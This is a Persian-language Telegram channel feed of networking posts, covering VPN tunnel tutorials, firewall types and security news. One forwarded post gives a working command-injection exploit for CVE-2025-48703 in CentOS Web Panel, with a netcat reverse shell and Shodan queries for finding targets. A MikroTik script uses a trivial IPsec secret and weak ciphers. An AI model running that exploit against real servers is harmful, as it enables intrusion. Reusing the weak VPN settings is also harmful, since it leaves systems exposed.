Please open Telegram to view this post
VIEW IN TELEGRAM
👍45🤣8😁2👎1🤝1
اگه نمیدونی از کجای برنامهنویسی یا دنیای آیتی شروع کنی؟ سایت Roadmap.sh دقیقاً همون چیزیه که لازم داری.
مسیر یادگیری هر شاخه مثل فرانتاند، بکاند، امنیت و کلی چیز دیگه رو مرحلهبهمرحله و ساده نشونت میده تا بدون سردرگمی چی رو کی و چطور یاد بگیری. یه جور نقشه راهه واسه رسیدن به دانش و آگاهی شغل و یا تخصص مورد نظرت.
مسیر یادگیری هر شاخه مثل فرانتاند، بکاند، امنیت و کلی چیز دیگه رو مرحلهبهمرحله و ساده نشونت میده تا بدون سردرگمی چی رو کی و چطور یاد بگیری. یه جور نقشه راهه واسه رسیدن به دانش و آگاهی شغل و یا تخصص مورد نظرت.
roadmap.sh
Developer Roadmaps - roadmap.sh
Community driven roadmaps, articles and guides for developers to grow in their career.
👍17❤7👎1
Forwarded from EYE
CVE-2025-48703: RCE in Centos7 Web Panel
The vulnerability allows an attacker to bypass the authentication process and perform code injection.
Exploit:
Query:
The vulnerability allows an attacker to bypass the authentication process and perform code injection.
Exploit:
curl -kis 'https://127.0.0.1:52083/myuser/index.php?module=filemanager&acc=changePerm' --data 'fileName=.bashrc¤tPath=/home/myuser&t_total=`nc 1.2.3.4 9999 -e /bin/bash`'
Query:
Netlas.io: http.headers.server:"cwpsrv"
Shodan: Server: “cwpsrv”
❤4👍1👎1
localhost
برای اتصال L2TPv3 دریابید.
Media is too big
VIEW IN TELEGRAM
آموزش راه اندازی تانل ریورس L2TPv3 روی سیستم عامل میکروتیک
👍8❤2👎1
localhost
آموزش راه اندازی تانل ریورس L2TPv3 روی سیستم عامل میکروتیک
ip firewall nat add chain=srcnat action=masquerade
/ip pool
add name=vpn ranges=172.31.0.2-172.31.0.231
/ppp profile
add change-tcp-mss=yes local-address=172.31.0.1 name=vpn remote-address=vpn use-encryption=yes dns-server=8.8.8.8 use-mpls=default use-compression=default
/interface l2tp-server server
set default-profile=vpn enabled=yes ipsec-secret=123456 use-ipsec=yes
/ip ipsec proposal
set [ find default=yes ] enc-algorithms=3des
/interface pptp-server server
set default-profile=vpn enabled=yes authentication=chap,pap,mschap1,mschap2
اسکریپت آماده فعال سازی L2TP وPPTP و پروفایل vpn بهمراه ip pool
👍12❤1
آموزش راه اندازی L2TPv3 بر روی لینوکس:
تونل Layer 2 (مانند Ethernet) بین دو سرور با آیپی ثابت، مثلاً:
سرور ایران: IRAN_IP = 185.10.10.1
سرور خارج: KHAREJ_IP = 45.88.88.1
Tunnel ID: 100
Session ID: 200
نکته: میتونید پورت UDP 1701 رو فقط بین این دو IP باز بذارید.
برای پایداری، این دستورات باید داخل فایل systemd یا اسکریپت بوت مثل /etc/rc.local قرار بگیرن. چون با ریبوت، از بین میره.
من خودم این رو تست نکردم، تست کنید و نتیجه رو به منم بگید.
تونل Layer 2 (مانند Ethernet) بین دو سرور با آیپی ثابت، مثلاً:
سرور ایران: IRAN_IP = 185.10.10.1
سرور خارج: KHAREJ_IP = 45.88.88.1
Tunnel ID: 100
Session ID: 200
روی هر دو سرور:sudo apt update
sudo apt install iproute2
پیکربندی سرور ایران:sudo ip l2tp add tunnel tunnel_id 100 peer_tunnel_id 100 \
encap udp local 185.10.10.1 remote 45.88.88.1 \
udp_sport 1701 udp_dport 1701
sudo ip l2tp add session tunnel_id 100 session_id 200 peer_session_id 200 \
name l2tp0
sudo ip link set l2tp0 up
sudo ip addr add 192.168.100.1/30 dev l2tp0
پیکربندی روی سرور خارج:sudo ip l2tp add tunnel tunnel_id 100 peer_tunnel_id 100 \
encap udp local 45.88.88.1 remote 185.10.10.1 \
udp_sport 1701 udp_dport 1701
sudo ip l2tp add session tunnel_id 100 session_id 200 peer_session_id 200 \
name l2tp0
sudo ip link set l2tp0 up
sudo ip addr add 192.168.100.2/30 dev l2tp0
برای تست اتصال هم آیپی آدرس لوکالی که در نظر گرفتی رو تست میکنی. اگر پینگ داد یعنی اوکی شده و بدون مشکل به نتیجه رسیده.
نکته: میتونید پورت UDP 1701 رو فقط بین این دو IP باز بذارید.
برای پایداری، این دستورات باید داخل فایل systemd یا اسکریپت بوت مثل /etc/rc.local قرار بگیرن. چون با ریبوت، از بین میره.
من خودم این رو تست نکردم، تست کنید و نتیجه رو به منم بگید.
❤10👎2👍1
بنظر شما هم امشب یکی از شدید ترین اختلال ها بعد از آتش بس هستش؟
Final Results
37%
آره، واقعا خیلی داره اذیت میکنه.
25%
اختلال هست ولی نه اونقدری که اذیت کنه
22%
نه، هیچ اختلالی حس نمیشه.
16%
نظری ندارم.
انواع فایروال📶
1- stateless packet filtering
سادهترین فایروال! فقط هدر بستههای IP رو نگاه میکنه:
IP Source/Destination, Port, Protocol.
هیچ اطلاعاتی از وضعیت سشن نداره.
برای مثال اگر که میگیم به یک IP روی پورت 80 باید براش قانون برگشت هم بنویسیم که بگیم از همون IP روی پورت 80 اجازهی ارسال بسته وجود دارد.
مانند:
Linux IPTABLES
Cisco ACL
2- Stateful packet filtering
این مدل وضعیت اتصال (Session Table) رو نگه میداره. یعنی متوجه میشه که اگر به یک IP روی پورت 80 درخواست ارتباط مجاز است, پس از همون IP روی پورت 80 هم درخواست مجاز است و لازم به نوشتن یک قانون دیگه براش نیست.
مانند :
Cisco ASA
FortiGate
Palo Alto
3- Application proxy
یک واسطه بین سرور و کاربر است.
کاربر درخواست هارو به پروکسی ارسال میکنه, پروکسی اون محتوای اون درخواست رو کامل چک میکنه و سپس درخواست رو برای سرور ارسال میکنه .
مانند:
Fortiweb
F5
4- UTM
همون stateful firewall است, اما اینجا فقط پورت و IP چک نمیشود بلکه تک تک محتوای ترافیک با ابزار هایی مانند Ips و antivirus و …بررسی میشود.
تفاوتش با app proxy ها در این است که UTM ترافیک را در حین انتقال بررسی میکند, اما app proxy ها مانند یک واسط درخواست رو میگیره, کامل بررسی میکنه و سپس انتقال میده.
مانند:
FortiGate (UTM Mode)
Cisco Firepower
1- stateless packet filtering
سادهترین فایروال! فقط هدر بستههای IP رو نگاه میکنه:
IP Source/Destination, Port, Protocol.
هیچ اطلاعاتی از وضعیت سشن نداره.
برای مثال اگر که میگیم به یک IP روی پورت 80 باید براش قانون برگشت هم بنویسیم که بگیم از همون IP روی پورت 80 اجازهی ارسال بسته وجود دارد.
مانند:
Linux IPTABLES
Cisco ACL
2- Stateful packet filtering
این مدل وضعیت اتصال (Session Table) رو نگه میداره. یعنی متوجه میشه که اگر به یک IP روی پورت 80 درخواست ارتباط مجاز است, پس از همون IP روی پورت 80 هم درخواست مجاز است و لازم به نوشتن یک قانون دیگه براش نیست.
مانند :
Cisco ASA
FortiGate
Palo Alto
3- Application proxy
یک واسطه بین سرور و کاربر است.
کاربر درخواست هارو به پروکسی ارسال میکنه, پروکسی اون محتوای اون درخواست رو کامل چک میکنه و سپس درخواست رو برای سرور ارسال میکنه .
مانند:
Fortiweb
F5
4- UTM
همون stateful firewall است, اما اینجا فقط پورت و IP چک نمیشود بلکه تک تک محتوای ترافیک با ابزار هایی مانند Ips و antivirus و …بررسی میشود.
تفاوتش با app proxy ها در این است که UTM ترافیک را در حین انتقال بررسی میکند, اما app proxy ها مانند یک واسط درخواست رو میگیره, کامل بررسی میکنه و سپس انتقال میده.
مانند:
FortiGate (UTM Mode)
Cisco Firepower
Please open Telegram to view this post
VIEW IN TELEGRAM
❤16🤣1
فعلا تازه اینا پخش شده
معلوم نیست واقعا هک کردن یا نه
باید صبر کرد
معلوم نیست واقعا هک کردن یا نه
باید صبر کرد
🤣24👍1🤯1
Forwarded from Sudoer (Morteza Bashsiz)
ویدیو شماره ۱ - آشنایی با DNS
توی این ویدیو یه توضیحات خیلی کلی از عملکرد و اهمیت DNS دادم.
https://youtu.be/TXvdyPbxeag
توی این ویدیو یه توضیحات خیلی کلی از عملکرد و اهمیت DNS دادم.
https://youtu.be/TXvdyPbxeag
YouTube
ویدیو شماره ۱ - آشنایی با DNS
توی این ویدیو یه توضیحات خیلی کلی از عملکرد و اهمیت DNS دادم.
👍4❤2
Forwarded from Milad Nouri(ツ) میلاد نوری
Media is too big
VIEW IN TELEGRAM
🛡 ابزار ساده و کاربردی برای محافظت در برابر پیامکهای فیشینگ، لینکهای کلاهبرداری و اپلیکیشنهای مشکوک و مخرب
در صورتی که این پروژه رو مفید میدونید، میتونید با حمایت مالی (دونیت)، به توسعه و بهبود مستمر این پروژه کمک کنید:
من ساختمش. بازنشر و معرفیش با شما 🤝 تقدیم به مردم ایران
توضیح بیشتر در ویدیو، اطلاعات کاملتر در وبسایت:
وبسایت مطمئن باش - سوالهای پرتکرار - سیاست حریم خصوصی
از این به بعد موقع دریافت پیامک، نصب اپلیکیشن یا باز کردن سایت فیشینگ و کلاهبرداری، در صورت شناسایی، اپلیکیشن "مطمئن باش" به شما هشدار میده. اگر هم به مورد جدیدی برخورد کردید از طریق دکمه گزارش در سایت یا اپلیکیشن ارسال کنید تا با کمک شما روز به روز کلاهبرداریهای بیشتری شناسایی بشه.
برای تست سپر وبگردی میتونید به جای سایتهای کلاهبرداری واقعی، این لینک که فقط برای تست این قابلیت برنامه ساخته شده و هیچ خطری نداره رو باز کنید.
کلیه بررسیها و پردازشهای اپلیکیشن به صورت آفلاین و روی گوشی کاربر انجام میشود و اطلاعات اپهای نصب شده، پیامکها و... هیچ کدام به سرور ارسال نمیشود. در بازههای زمانی مختلف دیتابیس برنامه از یک مخزن (ریپازیتوری) گیتهاب بروزرسانی میشود.
Please open Telegram to view this post
VIEW IN TELEGRAM
1❤14👍2🤣2
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3
Forwarded from مگاهرتز (Mohammad Zarchi)
Geek Alerts
جکدورسی پیامرسان بدون نیاز به اینترنت به اسم bitchat رو ساخته، میگه هدفش اینه اینترنت کشوری قطع شد هنوز بشه پیام داد، میاد بر پایه بلوتوث یه شبکه مِش میسازه و پیامها رو بین دستگاهها پخش میکنه تا به مقصد برسن.
نسخه اندروید bitchat در ریپوی زیر قابل دریافته، محیط نوستالژیکی داره، یکم وقتم آزاد بشه میرم الگوریتم و پروتکلهاشو زیر رو میکنم:
- callebtc/bitchat-android
@MohammadZarchi🛰
- callebtc/bitchat-android
@MohammadZarchi
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5
Forwarded from اخبار داغ امنیت شبکه
🔴 آسیبپذیری جدید در Microsoft SQL Server
مایکروسافت، شرکت مستقر در ایالات متحده، در بهروزرسانی Patch Tuesday جولای ۲۰۲۵ خود، یک آسیبپذیری روز صفر (CVE-2025-49719) را در Microsoft SQL Server برطرف کرد. این آسیبپذیری، که امکان افشای اطلاعات حساس از طریق شبکه را برای مهاجمان غیرمجاز فراهم میکرد، پیش از انتشار وصله بهصورت عمومی افشا شده بود. این نقص، که توسط ولادیمیر آلکسیچ از مایکروسافت کشف شد، به دلیل اعتبارسنجی نادرست ورودیها ایجاد شده و تهدیدی جدی برای سرورهای SQL در سراسر جهان محسوب میشود. این بهروزرسانی همچنین ۱۳۷ آسیبپذیری دیگر، از جمله ۱۴ نقص بحرانی، را برطرف کرده است.
جزئیات آسیبپذیری چیست؟
شناسه: CVE-2025-49719
نوع تهدید: افشای اطلاعات (Information Disclosure)
امتیاز CVSS: ۷.۵ (بالا)
محصولات تحت تأثیر: نسخههای مختلف Microsoft SQL Server
روش بهرهبرداری: مهاجم غیرمجاز میتواند با ارسال درخواستهای مخرب از طریق شبکه، اطلاعات حساس مانند دادههای پایگاه داده را استخراج کند.
مطالعه کامل خبر 👉
🆔 @TakianCo
🇮🇷
مایکروسافت، شرکت مستقر در ایالات متحده، در بهروزرسانی Patch Tuesday جولای ۲۰۲۵ خود، یک آسیبپذیری روز صفر (CVE-2025-49719) را در Microsoft SQL Server برطرف کرد. این آسیبپذیری، که امکان افشای اطلاعات حساس از طریق شبکه را برای مهاجمان غیرمجاز فراهم میکرد، پیش از انتشار وصله بهصورت عمومی افشا شده بود. این نقص، که توسط ولادیمیر آلکسیچ از مایکروسافت کشف شد، به دلیل اعتبارسنجی نادرست ورودیها ایجاد شده و تهدیدی جدی برای سرورهای SQL در سراسر جهان محسوب میشود. این بهروزرسانی همچنین ۱۳۷ آسیبپذیری دیگر، از جمله ۱۴ نقص بحرانی، را برطرف کرده است.
جزئیات آسیبپذیری چیست؟
شناسه: CVE-2025-49719
نوع تهدید: افشای اطلاعات (Information Disclosure)
امتیاز CVSS: ۷.۵ (بالا)
محصولات تحت تأثیر: نسخههای مختلف Microsoft SQL Server
روش بهرهبرداری: مهاجم غیرمجاز میتواند با ارسال درخواستهای مخرب از طریق شبکه، اطلاعات حساس مانند دادههای پایگاه داده را استخراج کند.
مطالعه کامل خبر 👉
🆔 @TakianCo
🇮🇷
❤3🤣3
Forwarded from Net 4All | الفبای شبکه (Dark Code it)
#اخبارھڪ
🦠خبر فوری برای دوستان برنامە نویس 🩸
هشدار: یک افزونه محبوب VS Code برای قراردادهای هوشمند اتریوم با ۲ خط کد مخفی ...
سرقت ارز دیجیتال؟ مسمومیت قراردادی؟
این حمله بیش از ۶۰۰۰ توسعهدهنده را فریب دادە
لینک منبع خبر
—————
@net4alll
🦠خبر فوری برای دوستان برنامە نویس 🩸
هشدار: یک افزونه محبوب VS Code برای قراردادهای هوشمند اتریوم با ۲ خط کد مخفی ...
سرقت ارز دیجیتال؟ مسمومیت قراردادی؟
این حمله بیش از ۶۰۰۰ توسعهدهنده را فریب دادە
لینک منبع خبر
—————
@net4alll
👍10❤1😁1🤣1
دوستان روش هایی که گفته میشه رو به صورت پشت سر هم با Distance های پشت سر هم قرار بدید که در صورت از دسترس خارج شدن هر روش، روی روش بعدی به صورت خودکار سوئیچ بکنه.
چون الان اختلال زیاد هستش و شما هم نمیتونی دائما پشت سرور بشینی و دستی روتینگ رو تغییر بدی.
چون الان اختلال زیاد هستش و شما هم نمیتونی دائما پشت سرور بشینی و دستی روتینگ رو تغییر بدی.
👍8